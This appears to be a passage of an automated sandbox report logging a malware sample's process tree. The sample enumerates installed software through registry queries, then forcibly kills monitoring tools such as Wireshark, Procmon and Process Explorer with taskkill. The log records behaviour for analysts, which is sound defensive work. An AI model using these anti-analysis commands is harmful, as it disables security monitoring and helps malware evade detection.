C:\Windows\system32\cmd.execmd.exe2⤵PID:584
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1524
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:1584
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1672
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:1120
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1908
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1136
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1552
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1368
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2024
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:108
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1596
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1576
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:1924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1216
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:1112
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:2012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:1376
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1664
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1900
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1100
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:660
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:1696
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:1608
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:536
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:1972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:240
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1928
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:1008
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:1912
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:1892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:1808
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1572
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1832
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2020
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:376
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1596
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1840
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1560
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:1476
-